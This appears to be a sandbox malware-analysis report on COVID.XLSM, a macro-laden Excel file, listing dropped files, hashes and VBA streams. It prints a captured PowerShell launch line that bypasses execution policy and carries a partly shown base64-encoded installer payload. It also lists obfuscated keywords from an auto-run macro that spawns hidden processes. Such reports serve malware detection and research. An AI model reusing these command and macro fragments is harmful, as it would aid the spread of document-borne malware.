                                                                                                                                              Size (bytes):33792
                                                                                                                                              Entropy (8bit):7.986190069917012
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:TYg4p/y01k5xsyD4Pc+aJAaufwGpI+/i3jPwrgk7LD8RB+x6e/au7Ji04HFoZ1mh:TYpp3zyM+J9RGpbokfD8RB+L/7j4OZ6Z
                                                                                                                                              MD5:98331EEB50A644187B6A8081251A5DC2
                                                                                                                                              SHA1:50BC9695687A7E1EBDFF8AD191F8125D9E080410
                                                                                                                                              SHA-256:FA921E6572C0A6B3EC1E193CE87E07F9756EFFC0BD16FBD45C88AC1EBE75C458
                                                                                                                                              SHA-512:5276AB809A7849AD4709A0B7A288C7E8413B9F152E659D28CA65A25531DEC33EFC5589ECDF8BBEA2121314023F93C86EDA376E2D591721540171C8BB26EB6493
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview: .PNG........IHDR...Z...y............pHYs..........o.d...@PLTE....................................@;5................r.........@;7.....................?8-.uB>5......................E:+.w..............................M4...........o......%%%.{.....................................................................9.,...999...,,,...$.......C*.......222........QQQ.....???....) 8..WWW...{{{..A5!.|...4,.........eee&........C/..w.....```......tk[ZQA..zHHH.~...MLLDDC.....LC4......{rc...SJ9...kkk[[[kbRuuu:2#...ppp.zjbYI....q.....k...nPO....m......V]v^e~.~...d6..cE.&.....tV*..f...x]\..X.rD.......qp..Oms.}..........Bz"...fIDATx.._..H.............7?.....W.\_.Y.D.". 2dC\_V....'....|.2vw.;.IO.\z...?I.u.../...A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..A..)....A..o....y...B$t..P.................?....J....zv.c......W(~.Q.E.}g...gd......e.<.>x...8...J....-[..`_....#\.,..].%.W..E...O=.HW..O.<..........;=A;......wv..ZW.^...j.7t..36~......m..
                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1196
                                                                                                                                              Entropy (8bit):5.333915035046385
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9+d:qZPerB4nqRL/HvFe9t4Cv94an+d
                                                                                                                                              MD5:C559CE34C3E40660BFCF532F1DB632A1
                                                                                                                                              SHA1:E8DD36485347F0D309602EB3DE1EB704DFD48D00
                                                                                                                                              SHA-256:CE3F8DAD9C5449DB0E8AFB39012720F64432C26D1C5F3DEA7C466A5D9FEA019A
                                                                                                                                              SHA-512:149E232B112B29A02A4443F19533822CC79D70B85E7D896AB4925247C0F79524C8EE13FFA9F465CD144BA73B8821D5697973056907494EC3935B5D910AC44C19
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_auo44y4y.l0i.ps1
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview: 1
                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq1iqdxz.5cl.psm1
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                              Preview: 1
                                                                                                                                              C:\Users\user\Desktop\~$COVID.XLSM
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              C:\Users\user\Documents\20210826\PowerShell_transcript.675052.5LFBxafq.20210826072919.txt
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, LF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):32820
                                                                                                                                              Entropy (8bit):5.126813110627341
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:eM5exTRM5exTbM5exToM5exTlM5exTu0M5exTl:zYaYcY5Y+Y4Yp
                                                                                                                                              MD5:513EA5C4C1F66F5A5209E5D431192B05
                                                                                                                                              SHA1:8B18BDDBAAB480D8728016333BA7121F64F628F7
                                                                                                                                              SHA-256:9F6BBA2A286311BCA100387A28F1BA11B0055EB6B413FDBD04103172E11CCA8F
                                                                                                                                              SHA-512:B58D0AE91B11F107E58BBC8DE65540A717545F2F33119F1E97E2AD59217DF1010CADC908D469AF845DE84DB2F574B4C7139699ABB48F62E1ECDDBC215AD6A62E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210826072920..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 675052 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAA

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.97231654284083
                                                                                                                                              TrID:
                                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 52.24%
                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 39.80%
                                                                                                                                              • ZIP compressed archive (8000/1) 7.96%
                                                                                                                                              File name:COVID.XLSM
                                                                                                                                              File size:68807
                                                                                                                                              MD5:c123363068a4651c9c0c6b4e01b35142
                                                                                                                                              SHA1:8de437d8df29c53e9ebb03a797fdbf805c10429a
                                                                                                                                              SHA256:e5e65b70b5497f146609db5c086e997a4b0ab2352b534c9e25d8a10407801d78
                                                                                                                                              SHA512:716b63a43665148721ef8a1f8f43e8cadeac054af3788d6d496df8e71cc0dae12b880e98531d8087b16033330525fb051a45e689be51276aa1de68c5ea44a6d4
                                                                                                                                              SSDEEP:1536:ojIIRVJJfdsj1kFKEOkv1DRm7PAoLl2idZ19SpV:onrJJfdkUKEV1DRm7PAoxDbSpV
                                                                                                                                              File Content Preview:PK...........S................[Content_Types].xml.....................V.n.0.....B...EQX..I.m...@.k.1_.2...]J1..r..6..Drvgf)b..U.l...&..]......._6.......0K.......dW...&.V...am.....Zp.y...Y..d.iZ.(.J.A\N&...>..u..l6...|...2.......Q2.-..z.....Q..zt..1&..[..,

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:74ecd0e2f696908c

                                                                                                                                              Static OLE Info

                                                                                                                                              General

                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1

                                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/471900/sample/COVID.XLSM"

                                                                                                                                              Indicators

                                                                                                                                              Has Summary Info:False
                                                                                                                                              Application Name:unknown
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:
                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                              Flash Objects Count:
                                                                                                                                              Contains VBA Macros:True

                                                                                                                                              Summary

                                                                                                                                              Subject:Removed Hoo36:HA/HB/HQ and corresponding crosswalk and 2nd modifer codes per CABHA policy and IU82.
                                                                                                                                              Author:twildfir
                                                                                                                                              Last Saved By:Administrator
                                                                                                                                              Create Time:2001-04-16T18:40:12Z
                                                                                                                                              Last Saved Time:2021-08-05T13:08:31Z
                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                              Security:0

                                                                                                                                              Document Summary

                                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                                              Company:Thomas S Services
                                                                                                                                              Contains Dirty Links:false
                                                                                                                                              Shared Document:false
                                                                                                                                              Changed Hyperlinks:false
                                                                                                                                              Application Version:16.0300

                                                                                                                                              Streams with VBA

                                                                                                                                              VBA File Name: Alt Svc Array.cls, Stream Size: 177
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Alt Svc Array
                                                                                                                                              VBA File Name:Alt Svc Array.cls
                                                                                                                                              Stream Size:177
                                                                                                                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " A l t . S v c A r r a y " . . . . B a . s . . 0 { 0 0 0 2 ` 0 8 2 0 - . . . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2
                                                                                                                                              Data Raw:01 ad b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 41 6c 74 00 20 53 76 63 20 41 72 72 20 61 79 22 0d 0a 0a 90 42 61 02 73 02 90 30 7b 30 30 30 32 60 30 38 32 30 2d 00 10 04 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d2 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              Array"
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "Alt Svc Array"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              VBA File Name: Archived Alt Svcs.cls, Stream Size: 179
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Archived Alt Svcs
                                                                                                                                              VBA File Name:Archived Alt Svcs.cls
                                                                                                                                              Stream Size:179
                                                                                                                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " A r c . h i v e d A l . t S v c s " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . I F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s . . . @ T e m p . l a t e D e r . v . . C u s t o m i z . . D . 2
                                                                                                                                              Data Raw:01 af b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 41 72 63 00 68 69 76 65 64 20 41 6c 00 74 20 53 76 63 73 22 0d 22 0a 0a a0 42 61 73 02 a0 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 da 53 70 61 63 01 49 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              Svcs"
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              "Archived
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "Archived Alt Svcs"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              VBA File Name: Service Array.cls, Stream Size: 178
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Service Array
                                                                                                                                              VBA File Name:Service Array.cls
                                                                                                                                              Stream Size:178
                                                                                                                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " S e r . v i c e A r r a y " . . . . B a . s . . 0 { 0 0 0 2 ` 0 8 2 0 - . . . . C # . . . . 4 6 } . | G l . o b a l . . S p a . . . = F a l s e . . % C r e a t a b . l . . P r e d e c $ l a . . I d . # T r . u . " E x p o s e . . . . @ T e m p l a . t e D e r i v . . . C u s t o m i z . . D . 2
                                                                                                                                              Data Raw:01 ae b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 53 65 72 00 76 69 63 65 20 41 72 72 20 61 79 22 0d 0a 0a 90 42 61 02 73 02 90 30 7b 30 30 30 32 60 30 38 32 30 2d 00 10 04 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d2 53 70 61 01 00 c6 3d 20 46 61 6c 73 65 01 0c 25 43 72 65 61 74 61 62 02 6c 15 1f 50 72 65 64 65 63 24 6c 61 00 06 49

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              "Service
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              Array"
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "Service Array"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              VBA File Name: Sheet3.cls, Stream Size: 171
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/Sheet3
                                                                                                                                              VBA File Name:Sheet3.cls
                                                                                                                                              Stream Size:171
                                                                                                                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " C O V . I D - 1 9 " . . . . . B a s . | 0 { 0 . 0 0 2 0 8 2 0 - . . . . C . . . . 4 6 } . . | G l o b a l . . . S p a c . . F a l . s e . % C r e a t . a b l . . P r e d . e c l a . . I d . # . T r u . " E x p o . s e . . . @ T e m p . l a t e D e r i . v . % C u s t o m . i z . D . 2
                                                                                                                                              Data Raw:01 a7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 43 4f 56 00 49 44 2d 31 39 22 0d 0a 11 0a f8 42 61 73 02 7c 30 7b 30 00 30 30 32 30 38 32 30 2d 1b 00 20 04 08 43 05 12 03 00 34 36 7d 81 0d 7c 47 6c 6f 62 61 6c 01 c8 10 53 70 61 63 01 92 46 61 6c 04 73 65 0c 25 43 72 65 61 74 08 61 62 6c 15 1f 50 72 65 64 90 65 63 6c 61 00 06 49 64 00 23 08 54 72 75

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              False
                                                                                                                                              VB_Exposed
                                                                                                                                              Attribute
                                                                                                                                              VB_Name
                                                                                                                                              VB_Creatable
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              VB_Base
                                                                                                                                              VB_Customizable
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "COVID-19"
                                                                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              VBA File Name: ThisWorkbook.cls, Stream Size: 21290
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/ThisWorkbook
                                                                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                                                                              Stream Size:21290
                                                                                                                                              Data ASCII:. ( . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D 1 . 2 . . P . . . . C . o n s t c l O @ n e M a s k . . 1 . 6 5 1 5 0 7 2 D . . T w o . . 2 ` 5 8 0 4 8 . . . . h . r e . & 4 0 3 . $ . . . F o u r . . 6
                                                                                                                                              Data Raw:01 28 b6 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                                                                                                                              VBA Code Keywords

                                                                                                                                              Keyword
                                                                                                                                              Err.Raise(vbObjectError,
                                                                                                                                              objProcess
                                                                                                                                              HFJWES()
                                                                                                                                              Byte,
                                                                                                                                              vbNullString)
                                                                                                                                              Byte)
                                                                                                                                              KXHYIJHM
                                                                                                                                              UUWMBBYKB
                                                                                                                                              XUN_Status_IIWSY
                                                                                                                                              vbUnicode)
                                                                                                                                              Long,
                                                                                                                                              string
                                                                                                                                              YPMONNH()
                                                                                                                                              COATGA()
                                                                                                                                              Left$(sOut,
                                                                                                                                              fileStr
                                                                                                                                              HGOJT
                                                                                                                                              KEXMPA
                                                                                                                                              JRXIGRYYS()
                                                                                                                                              Select
                                                                                                                                              AZZOPCRZ
                                                                                                                                              Null,
                                                                                                                                              SJCJKCEIK
                                                                                                                                              LIOHCE
                                                                                                                                              "==")
                                                                                                                                              SMKCP()
                                                                                                                                              Chr(IFDHRCKM)
                                                                                                                                              BypasS
                                                                                                                                              TLVGOS
                                                                                                                                              YPMONNH
                                                                                                                                              ElseIf
                                                                                                                                              DNNNEG()
                                                                                                                                              GNNYSJH()
                                                                                                                                              VB_Exposed
                                                                                                                                              vbCr,
                                                                                                                                              Integer,
                                                                                                                                              JEMZL
                                                                                                                                              objStartup
                                                                                                                                              ZCJRIAGUQ
                                                                                                                                              NEQOX
                                                                                                                                              ALUJKC()
                                                                                                                                              sngEnd
                                                                                                                                              objConfig,
                                                                                                                                              objConfig
                                                                                                                                              VB_GlobalNameSpace
                                                                                                                                              GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM,
                                                                                                                                              UBound(bIn)
                                                                                                                                              KUROX
                                                                                                                                              VB_Customizable
                                                                                                                                              "Input
                                                                                                                                              LIOHCE()
                                                                                                                                              While
                                                                                                                                              clFourMask
                                                                                                                                              Const
                                                                                                                                              YJIEAROTM
                                                                                                                                              "ThisWorkbook"
                                                                                                                                              Pause
                                                                                                                                              XIPVTCZDC
                                                                                                                                              False
                                                                                                                                              CGZLOG
                                                                                                                                              QVLNNDSKO()
                                                                                                                                              Workbook_Open()
                                                                                                                                              String,
                                                                                                                                              String)
                                                                                                                                              JRXIGRYYS
                                                                                                                                              ROUSOTA
                                                                                                                                              DNSXAYNXP()
                                                                                                                                              clHighMask
                                                                                                                                              StrConv(sString,
                                                                                                                                              bOut((((UBound(bIn)
                                                                                                                                              NJMJWPKXQ
                                                                                                                                              BVPGJO
                                                                                                                                              JHHCFDZ()
                                                                                                                                              VerifyPath
                                                                                                                                              UUWMBBYKB()
                                                                                                                                              lTemp
                                                                                                                                              SMKCP
                                                                                                                                              VB_Creatable
                                                                                                                                              clThreeMask
                                                                                                                                              GYFM(FUUF
                                                                                                                                              intProcessID
                                                                                                                                              -ExecutionPolicy
                                                                                                                                              KFUTZNLZL()
                                                                                                                                              NEQOX()
                                                                                                                                              GNNYSJH
                                                                                                                                              VB_Name
                                                                                                                                              CCLMWCIDS()
                                                                                                                                              NSMUCQAR
                                                                                                                                              ILLKSP()
                                                                                                                                              vbLf,
                                                                                                                                              FLUZTZ()
                                                                                                                                              bTrans(lTemp)
                                                                                                                                              "cmd.exe
                                                                                                                                              clLowMask
                                                                                                                                              Single
                                                                                                                                              MZAYGW
                                                                                                                                              ZDOHNZM
                                                                                                                                              Public
                                                                                                                                              ReDim
                                                                                                                                              bIn()
                                                                                                                                              BAWYHCKJY()
                                                                                                                                              JFXGQIB
                                                                                                                                              YJIEAROTM()
                                                                                                                                              RPNIKTOKD
                                                                                                                                              BAWYHCKJY
                                                                                                                                              Replace(sString,
                                                                                                                                              XUN_Status_IIWSY()
                                                                                                                                              sngSecs
                                                                                                                                              VB_Base
                                                                                                                                              JPRWYVV
                                                                                                                                              ALUJKC
                                                                                                                                              OTRB(RPNIKTOKD
                                                                                                                                              KEXMPA()
                                                                                                                                              JEMZL()
                                                                                                                                              NJMJWPKXQ()
                                                                                                                                              HGOJT()
                                                                                                                                              JHHCFDZ
                                                                                                                                              Len(sOut)
                                                                                                                                              MZAYGW()
                                                                                                                                              AQMDIAVR
                                                                                                                                              OOTTQRB()
                                                                                                                                              "MyDecode",
                                                                                                                                              IFDHRCKM
                                                                                                                                              objProcess.Create
                                                                                                                                              sString
                                                                                                                                              OOTTQRB
                                                                                                                                              TLVGOS()
                                                                                                                                              bTrans(bIn(lChar
                                                                                                                                              clMidMask
                                                                                                                                              NSMUCQAR()
                                                                                                                                              AZZOPCRZ()
                                                                                                                                              ""powershell
                                                                                                                                              BVPGJO()
                                                                                                                                              COATGA
                                                                                                                                              Single)
                                                                                                                                              CovidMap()
                                                                                                                                              InStrRev(sString,
                                                                                                                                              bOut(lPos)
                                                                                                                                              DoEvents
                                                                                                                                              clOneMask
                                                                                                                                              VB_TemplateDerived
                                                                                                                                              KNNPPF()
                                                                                                                                              XIPVTCZDC()
                                                                                                                                              KXHYIJHM()
                                                                                                                                              bOut(lPos
                                                                                                                                              VerifyPath()
                                                                                                                                              clTwoMask
                                                                                                                                              JPRWYVV()
                                                                                                                                              strstr
                                                                                                                                              SJCJKCEIK()
                                                                                                                                              DNSXAYNXP
                                                                                                                                              StrConv(bOut,
                                                                                                                                              iPad)
                                                                                                                                              String
                                                                                                                                              ILLKSP
                                                                                                                                              QVLNNDSKO
                                                                                                                                              Timer
                                                                                                                                              KFUTZNLZL
                                                                                                                                              Len(sString)
                                                                                                                                              ROUSOTA()
                                                                                                                                              CGZLOG()
                                                                                                                                              objStartup.SpawnInstance_
                                                                                                                                              IZDFYVTMF
                                                                                                                                              HFJWES
                                                                                                                                              ZCJRIAGUQ()
                                                                                                                                              NEUWH
                                                                                                                                              objWMIService
                                                                                                                                              Attribute
                                                                                                                                              VB_PredeclaredId
                                                                                                                                              JFXGQIB()
                                                                                                                                              KUROX()
                                                                                                                                              strstr,
                                                                                                                                              FLUZTZ
                                                                                                                                              DNNNEG
                                                                                                                                              Function
                                                                                                                                              valid
                                                                                                                                              vbFromUnicode)
                                                                                                                                              lChar
                                                                                                                                              bOut()
                                                                                                                                              KNNPPF
                                                                                                                                              GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM,
                                                                                                                                              Pause(sngSecs
                                                                                                                                              lQuad
                                                                                                                                              AQMDIAVR()
                                                                                                                                              Private
                                                                                                                                              objConfig.ShowWindow
                                                                                                                                              IZDFYVTMF()
                                                                                                                                              VBA Code
                                                                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                                              Attribute VB_Creatable = False
                                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                                              Attribute VB_Exposed = False
                                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                                              Attribute VB_Customizable = True
                                                                                                                                              
                                                                                                                                              
                                                                                                                                              Private Const clOneMask = 16515072   
                                                                                                                                              Private Const clTwoMask = 258048     
                                                                                                                                              Private Const clThreeMask = 4032     
                                                                                                                                              Private Const clFourMask = 63        
                                                                                                                                              Private Const clHighMask = 16711680  
                                                                                                                                              Private Const clMidMask = 65280      
                                                                                                                                              Private Const clLowMask = 255        
